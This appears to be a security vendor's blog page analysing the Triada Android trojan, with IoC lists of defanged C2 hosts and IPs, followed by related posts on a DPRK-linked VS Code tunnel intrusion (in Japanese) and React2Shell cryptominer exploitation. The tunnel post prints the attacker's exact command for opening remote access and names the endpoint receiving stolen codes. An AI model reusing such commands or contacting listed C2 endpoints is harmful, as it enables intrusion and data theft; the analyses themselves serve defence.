October 14, 2024

How Triada Affects Banking and Communication Apps

Explore the intricacies of the Triada Trojan and its targeting of communication and banking apps. Learn how to safeguard against this threat.

Written by

Justin Torres

Cyber Analyst

Inside the SOC

Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.

Written by

Justin Torres

Cyber Analyst

Oct 2024

The rise of android malware

Recently, there has been a significant increase in malware strains targeting mobile devices, with a growing number of Android-based malware families, such as banking trojans, which aim to steal sensitive banking information from organizations and individuals worldwide.

These malware families attempt to access users’ accounts to steal online banking credentials and cookies, bypass multi-factor authentication (MFA), and conduct automatic transactions to steal funds [1]. They often masquerade as legitimate software or communications from social media platforms to compromise devices. Once installed, they use tactics such as keylogging, dumping cached credentials, and searching the file system for stored passwords to steal credentials, take over accounts, and potentially perform identity theft [1].

One recent example is the Antidot Trojan, which infects devices by disguising itself as an update page for Google Play. It establishes a command-and-control (C2) channel with a server, allowing malicious actors to execute commands and collect sensitive data [2].

Despite these malware’s ability to evade detection by standard security software, for example, by changing their code [3], Darktrace recently detected another Android malware family, Triada, communicating with a C2 server and exfiltrating data.

Triada: Background and tactics

First surfacing in 2016, Triada is a modular mobile trojan known to target banking and financial applications, as well as popular communication applications like WhatsApp, Facebook, and Google Mail [4]. It has been deployed as a backdoor on devices such as CTV boxes, smartphones, and tablets during the supply chain process [5]. Triada can also be delivered via drive-by downloads, phishing campaigns, smaller trojans like Leech, Ztorg, and Gopro, or more recently, as a malicious module in applications such as unofficial versions of WhatsApp, YoWhatsApp, and FM WhatsApp [6] [7].

How does Triada work?

Once downloaded onto a user’s device, Triada collects information about the system, such as the device’s model, OS version, SD card space, and list of installed applications, and sends this information to a C2 server. The server then responds with a configuration file containing the device’s personal identification number and settings, including the list of modules to be installed.

After a device has been successfully infected by Triada, malicious actors can monitor and intercept incoming and outgoing texts (including two-factor authentication messages), steal login credentials and credit card information from financial applications, divert in-application purchases to themselves, create fake messaging and email accounts, install additional malicious applications, infect devices with ransomware, and take control of the camera and microphone [4] [7].

For devices infected by unofficial versions of WhatsApp, which are downloaded from third-party app stores [9] and from mobile applications such as Snaptube and Vidmate , Triada collects unique device identifiers, information, and keys required for legitimate WhatsApp to work and sends them to a remote server to register the device [7] [12]. The server then responds by sending a link to the Triada payload, which is downloaded and launched. This payload will also download additional malicious modules, sign into WhatsApp accounts on the target’s phone, and request the same permissions as the legitimate WhatsApp application, such as access to SMS messages. If granted, a malicious actor can sign the user up for paid subscriptions without their knowledge. Triada then collects information about the user’s device and mobile operator and sends it to the C2 server [9] [12].

How does Triada avoid detection?

Triada evades detection by modifying the Zygote process, which serves as a template for every application in the Android OS. This enables the malware to become part of every application launched on a device [3]. It also substitutes system functions and conceals modules from the list of running processes and installed apps, ensuring that the system does not raise the alarm [3]. Additionally, as Triada connects to a C2 server on the first boot, infected devices remain compromised even after a factory reset [4].

Triada attack overview

Across multiple customer deployments, devices were observed making a large number of connections to a range of hostnames, primarily over encrypted SSL and HTTPS protocols. These hostnames had never previously been observed on the customers’ networks and appear to be algorithmically generated. Examples include “68u91.66foh90o[.]com”, “92n7au[.]uhabq9[.]com”, “9yrh7.mea5ms[.]com”, and “is5jg.3zweuj[.]com”.

Figure 1: External Sites Summary Graph showing the rarity of the hostname “92n7au[.]uhabq9[.]com” on a customer network.

Most of the IP addresses associated with these hostnames belong to an ASN associated with the cloud provider Alibaba (i.e., AS45102 Alibaba US Technology Co., Ltd). These connections were made over a range of high number ports over 1000, most commonly over 30000 such as 32091, which Darktrace recognized as extremely unusual for the SSL and HTTPS protocols.

Figure 2: Screenshot of a Model Alert Event log showing a device connecting to the endpoint “is5jg[.]3zweuj[.]com” over port 32091.

On several customer deployments, devices were seen exfiltrating data to hostnames which also appeared to be algorithmically generated. This occurred via HTTP POST requests containing unusual URI strings that were made without a prior GET request, indicating that the infected device was using a hardcoded list of C2 servers.

Figure 3: Screenshot of a Model Alert Event Log showing the device posting the string “i8xps1” to the hostname “72zf6.rxqfd[.]com.

Figure 4: Screenshot of a Model Alert Event Log showing the device posting the string “sqyjyadwwq” to the hostname “9yrh7.mea5ms[.]com”.

These connections correspond with reports that devices affected by Triada communicate with the C2 server to transmit their information and receive instructions for installing the payload.

A number of these endpoints have communicating files associated with the unofficial WhatsApp versions YoWhatsApp and FM WhatsApp [11] [12] [13] . This could indicate that the devices connecting to these endpoints were infected via malicious modules in the unofficial versions of WhatsApp, as reported by open-source intelligence (OSINT) [10] [12]. It could also mean that the infected devices are using these connections to download additional files from the C2 server, which could infect systems with additional malicious modules related to Triada.

Moreover, on certain customer deployments, shortly before or after connecting to algorithmically generated hostnames with communicating files linked to YoWhatsApp and FM WhatsApp, devices were also seen connecting to multiple endpoints associated with WhatsApp and Facebook.

Figure 5: Screenshot from a device’s event log showing connections to endpoints associated with WhatsApp shortly after it connected to “9yrh7.mea5ms[.]com”.

These surrounding connections indicate that Triada is attempting to sign in to the users’ WhatsApp accounts on their mobile devices to request permissions such as access to text messages. Additionally, Triada sends information about users’ devices and mobile operators to the C2 server.

The connections made to the algorithmically generated hostnames over SSL and HTTPS protocols, along with the HTTP POST requests, triggered multiple Darktrace models to alert. These models include those that detect connections to potentially algorithmically generated hostnames, connections over ports that are highly unusual for the protocol used, unusual connectivity over the SSL protocol, and HTTP POSTs to endpoints that Darktrace has determined to be rare for the network.

Conclusion

Recently, the use of Android-based malware families, aimed at stealing banking and login credentials, has become a popular trend among threat actors. They use this information to perform identity theft and steal funds from victims worldwide.

Across affected customers, multiple devices were observed connecting to a range of likely algorithmically generated hostnames over SSL and HTTPS protocols. These devices were also seen sending data out of the network to various hostnames via HTTP POST requests without first making a GET request. The URIs in these requests appeared to be algorithmically generated, suggesting the exfiltration of sensitive network data to multiple Triada C2 servers.

This activity highlights the sophisticated methods used by malware like Triada to evade detection and exfiltrate data. It underscores the importance of advanced security measures and anomaly-based detection systems to identify and mitigate such mobile threats, protecting sensitive information and maintaining network integrity.

Credit to: Justin Torres (Senior Cyber Security Analyst) and Charlotte Thompson (Cyber Security Analyst).

Appendices

Darktrace Model Detections

Model Alert Coverage

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / Multiple Connections to New External TCP Port

Anomalous Connection / Multiple HTTP POSTS to Rare Hostname

Anomalous Connections / Multiple Failed Connections to Rare Endpoint

Anomalous Connection / Suspicious Expired SSL

Compromise / DGA Beacon

Compromise / Domain Fluxing

Compromise / Fast Beaconing to DGA

Compromise / Sustained SSL or HTTP Increase

Compromise / Unusual Connections to Rare Lets Encrypt

Unusual Activity / Unusual External Activity

‍

AI Analyst Incident Coverage

Unusual Repeated Connections to Multiple Endpoints

Possible SSL Command and Control

Unusual Repeated Connections

List of Indicators of Compromise (IoCs)

Ioc – Type - Description

is5jg[.]3zweuj[.]com - Hostname - Triada C2 Endpoint
68u91[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
9yrh7[.]mea5ms[.]com - Hostname - Triada C2 Endpoint
92n7au[.]uhabq9[.]com - Hostname - Triada C2 Endpoint
4a5x2[.]fs4ah[.]com - Hostname - Triada C2 Endpoint
jmll4[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
mrswd[.]wo87sf[.]com - Hostname - Triada C2 Endpoint
lptkw[.]s4xx6[.]com - Hostname - Triada C2 Endpoint
ya27fw[.]k6zix6[.]com - Hostname - Triada C2 Endpoint
w0g25[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
kivr8[.]wd6vy[.]com - Hostname - Triada C2 Endpoint
iuwe64[.]ct8pc6[.]com - Hostname - Triada C2 Endpoint
qefgn[.]8z0le[.]com - Hostname - Triada C2 Endpoint
a6y0x[.]xu0h7[.]com - Hostname - Triada C2 Endpoint
wewjyw[.]qb6ges[.]com - Hostname - Triada C2 Endpoint
vx9dle[.]n0qq3z[.]com - Hostname - Triada C2 Endpoint
72zf6[.]rxqfd[.]com - Hostname - Triada C2 Endpoint
dwq[.]fsdw4f[.]com - Hostname - Triada C2 Endpoint
tqq6g[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
1rma1[.]4f8uq[.]com - Hostname - Triada C2 Endpoint
0fdwa[.]7j3gj[.]com - Hostname - Triada C2 Endpoint
5a7en[.]1e42t[.]com - Hostname - Triada C2 Endpoint
gmcp4[.]1e42t[.]com - Hostname - Triada C2 Endpoint
g7190[.]rt14v[.]com - Hostname - Triada C2 Endpoint
goyvi[.]2l2wa[.]com - Hostname - Triada C2 Endpoint
zq6kk[.]ca0qf[.]com - Hostname - Triada C2 Endpoint
sv83k[.]bn3avv[.]com - Hostname - Triada C2 Endpoint
9sae7h[.]ct8pc6[.]com - Hostname - Triada C2 Endpoint
jpygmk[.]qt7tqr[.]com - Hostname - Triada C2 Endpoint
av2wg[.]rt14v[.]com - Hostname - Triada C2 Endpoint
ugbrg[.]osz1p[.]com - Hostname - Triada C2 Endpoint
hw2dm[.]wtws9k[.]com - Hostname - Triada C2 Endpoint
kj9atb[.]hai8j1[.]com - Hostname - Triada C2 Endpoint
pls9b[.]b0vb3[.]com - Hostname - Triada C2 Endpoint
8rweau[.]j7e7r[.]com - Hostname - Triada C2 Endpoint
wkc5kn[.]j7e7r[.]com - Hostname - Triada C2 Endpoint
v58pq[.]mpvflv[.]com - Hostname - Triada C2 Endpoint
zmai4k[.]huqp3e[.]com - Hostname - Triada C2 Endpoint
eajgum[.]huqp3e[.]com - Hostname - Triada C2 Endpoint
mxl9zg[.]kv0pzv[.]com - Hostname - Triada C2 Endpoint
ad1x7[.]mea5ms[.]com - Hostname - Triada C2 Endpoint
ixhtb[.]s9gxw8[.]com - Hostname - Triada C2 Endpoint
vg1ne[.]uhabq9[.]com - Hostname - Triada C2 Endpoint
q5gd0[.]birxpk[.]com - Hostname - Triada C2 Endpoint
dycsw[.]h99n6[.]com - Hostname - Triada C2 Endpoint
a3miu[.]h99n6[.]com - Hostname - Triada C2 Endpoint
qru62[.]5qwu8b5[.]com - Hostname - Triada C2 Endpoint
3eox8[.]abxkoop[.]com - Hostname - Triada C2 Endpoint
0kttj[.]bddld[.]com - Hostname - Triada C2 Endpoint
gjhdr[.]xikuj[.]com - Hostname - Triada C2 Endpoint
zq6kk[.]wm0hd[.]com - Hostname - Triada C2 Endpoint
8.222.219[.]234 - IP Address - Triada C2 Endpoint
8.222.244[.]205 - IP Address - Triada C2 Endpoint
8.222.243[.]182 - IP Address - Triada C2 Endpoint
8.222.240[.]127 - IP Address - Triada C2 Endpoint
8.219.123[.]139 - IP Address - Triada C2 Endpoint
8.219.196[.]124 - IP Address - Triada C2 Endpoint
8.222.217[.]73 - IP Address - Triada C2 Endpoint
8.222.251[.]253 - IP Address - Triada C2 Endpoint
8.222.194[.]254 - IP Address - Triada C2 Endpoint
8.222.251[.]34 - IP Address - Triada C2 Endpoint
8.222.216[.]105 - IP Address - Triada C2 Endpoint
47.245.83[.]167 - IP Address - Triada C2 Endpoint
198.200.54[.]56 - IP Address - Triada C2 Endpoint
47.236.113[.]126 - IP Address - Triada C2 Endpoint
47.241.47[.]128 - IP Address - Triada C2 Endpoint
/iyuljwdhxk - URI - Triada C2 URI
/gvuhlbzknh - URI - Triada C2 URI
/sqyjyadwwq - URI - Triada C2 URI
/cncyz3 - URI - Triada C2 URI
/42k0zk - URI - Triada C2 URI
/75kdl5 - URI - Triada C2 URI
/i8xps1 - URI - Triada C2 URI
/84gcjmo - URI - Triada C2 URI
/fkhiwf - URI - Triada C2 URI

MITRE ATT&CK Mapping

Technique Name - Tactic - ID - Sub-Technique of

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Standard Application Layer Protocol - COMMAND AND CONTROL ICS - T0869

Non-Application Layer Protocol - COMMAND AND CONTROL - T1095

Masquerading - EVASION ICS - T0849

Man in the Browser - COLLECTION - T1185

Web Protocols - COMMAND AND CONTROL - T1071.001 -T1071

External Proxy - COMMAND AND CONTROL - T1090.002 - T1090

Domain Generation Algorithms - COMMAND AND CONTROL - T1568.002 - T1568

Web Services - RESOURCE DEVELOPMENT - T1583.006 - T1583

DNS - COMMAND AND CONTROL - T1071.004 - T1071

Fast Flux DNS - COMMAND AND CONTROL - T1568.001 - T1568

One-Way Communication - COMMAND AND CONTROL - T1102.003 - T1102

Digital Certificates - RESOURCE DEVELOPMENT - T1587.003 - T1587

References

[1] https://www.checkpoint.com/cyber-hub/cyber-security/what-is-trojan/what-is-a-banking-trojan/

[2] https://cyberfraudcentre.com/the-rise-of-the-antidot-android-banking-trojan-a-comprehensive-guide

[3] https://www.zimperium.com/glossary/banking-trojans/

[4] https://www.geeksforgeeks.org/what-is-triada-malware/

[5] https://www.infosecurity-magazine.com/news/malware-infected-devices-retailers/

[6] https://www.pcrisk.com/removal-guides/24926-triada-trojan-android

[7] https://securelist.com/malicious-whatsapp-mod-distributed-through-legitimate-apps/107690/

[8] https://securityboulevard.com/2024/02/impact-of-badbox-and-peachpit-malware-on-android-devices/

[9] https://threatpost.com/custom-whatsapp-build-malware/168892/

[10] https://securelist.com/triada-trojan-in-whatsapp-mod/103679/

[11] https://www.virustotal.com/gui/domain/is5jg.3zweuj.com/relations

[12] https://www.virustotal.com/gui/domain/92n7au.uhabq9.com/relations

[13] https://www.virustotal.com/gui/domain/68u91.66foh90o.com/relations

執筆者

Justin Torres

Cyber Analyst

Inside the SOC

Written by

Justin Torres

Cyber Analyst

Senior Director of Product, Cloud | Darktrace

Watch the NIS2 Webinar

Blog

Network

January 26, 2026

ダークトレース、韓国を標的とした、VS Codeを利用したリモートアクセス攻撃を特定

はじめに

ダークトレースのアナリストは、韓国のユーザーを標的とした、北朝鮮（DPRK）が関係していると思われる攻撃を検知しました。このキャンペーンはJavascriptEncoded（JSE）スクリプトと政府機関を装ったおとり文書を使ってVisual Studio Code（VS Code）トンネルを展開し、リモートアクセスを確立していました。

技術分析

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”. — 図1: 「2026年上半期国立大学院夜間プログラムの学生選抜に関する文書」という表題のおとり文書。

このキャンペーンで確認されたサンプルは、Hangul Word Processor （HWPX）文書に偽装したJSEファイルであり、スピアフィッシングEメールを使って標的に送付されたと考えられます。このJSEファイルは複数のBase64エンコードされたブロブを含み、Windows Script Hostによって実行されます。このHWPXファイルは“2026年上半期国立大学院夜間プログラムの学生選抜に関する文書(1)”という名前で、C:\ProgramDataにあり、おとりとして開かれます。この文書は韓国の公務員に関連する事務を管掌する政府機関、人事革新処を装ったものでした。文書内のメタデータから、脅威アクターは文書を本物らしくみせるため、政府ウェブサイトから文書を取得し、編集したと思われます。

Base64 encoded blob. — 図2: Base64エンコードされたブロブ

このスクリプトは次に、VSCode CLI ZIPアーカイブをMicrosoftからC:\ProgramDataへ、code.exe（正規のVS Code実行形式）およびout.txtという名前のファイルとともにダウンロードします。

隠されたウィンドウで、コマンドcmd.exe/c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene >"C:\ProgramData\out.txt" 2>&1 が実行され、 “bizeugene”という名前のVS Codeトンネルが確立されます。

VSCode Tunnel setup. — 図3: VSCode トンネルの設定

VS Codeトンネルを使うことにより、ユーザーはリモートコンピューターに接続してVisualStudio Codeを実行できます。リモートコンピューターがVS Codeサーバーを実行し、このサーバーはMicrosoftのトンネルサービスに対する暗号化された接続を作成します。その後ユーザーはGitHubまたはMicrosoftにサインインし、VS CodeアプリケーションまたはWebブラウザを使って別のデバイスからこのマシンに接続することができます。VS Codeトンネルの悪用は2023年に最初に発見されて以来、東南アジアのデジタルインフラおよび政府機関を標的とする[1]中国のAPT（AdvancedPersistent Threat）グループにより使用されています。

“out.txt” ファイルには、VS Code Serverログおよび生成されたGitHubデバイスコードが含まれています。脅威アクターがGitHubアカウントからこのトンネルを承認すると、VS Codeを使って侵害されたシステムに接続されます。これにより脅威アクターはこのシステムに対する対話型のアクセスが可能となり、VS Codeターミナルやファイルブラウザーを使用して、ペイロードの取得やデータの抜き出しが可能になります。

GitHub screenshot after connection is authorized. — 図5: 接続が承認された後のGitHub画面

このコード、およびトンネルトークン“bizeugene”が、POSTリクエストとしてhttps://www.yespp.co.kr/common/include/code/out.phpに送信されます。このコードは韓国にある正規のサイトですが、侵害されてC2サーバーとして使用されています。

まとめ

この攻撃で見られたHancom文書フォーマットの使用、政府機関へのなりすまし、長期のリモートアクセス、標的の選択は、過去に北朝鮮との関係が確認された脅威アクターの作戦パターンと一致しています。この例だけでは決定的なアトリビューションを行うことはできませんが、既存のDPRKのTTP（戦術、技法、手順）との一致は、このアクティビティが北朝鮮と関係を持つ脅威アクターから発生しているという確信を強めるものです。

また、このアクティビティは脅威アクターがカスタムマルウェアではなく正規のソフトウェアを使って、侵害したシステムへのアクセスを維持できる様子を示しています。VS Codeトンネルを使うことにより、攻撃者は専用のC2サーバーの代わりに、信頼されるMicrosoftインフラを使って通信を行うことができるのです。広く信頼されているアプリケーションの使用は、特に開発者向けツールがインストールされていることが一般的な環境では、検知をより困難にします。既知のマルウェアをブロックすることに重点を置いた従来型のセキュリティコントロールではこの種のアクティビティを識別することはできないかもしれません。ツール自体は有害なものではなく、多くの場合正規のベンダーによって署名されているからです。

作成：タラ・グールド（TaraGould）（マルウェア調査主任）
編集：ライアン・トレイル（Ryan Traill）（アナリストコンテンツ主任）

付録

侵害インジケータ (IoCs)

115.68.110.73 - 侵害されたサイトのIP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001- フィッシング: 添付ファイル

T1059- コマンドおよびスクリプトインタプリタ

T1204.002- ユーザー実行

T1027- ファイルおよび情報の難読化

T1218- 署名付きバイナリプロキシ実行

T1105- 侵入ツールの送り込み

T1090- プロキシ

T1041- C2チャネル経由の抜き出し

‍

参考資料

[1] https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

About the author

Blog

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.‍

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction. No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

About the author

Nathaniel Jones

VP, Security & AI Strategy, Field CISO

あなたのデータ × DarktraceのAI

唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ

デモを予約

Check out this article by Darktrace: How Triada Affects Banking and Communication Apps

How Triada Affects Banking and Communication Apps

The rise of android malware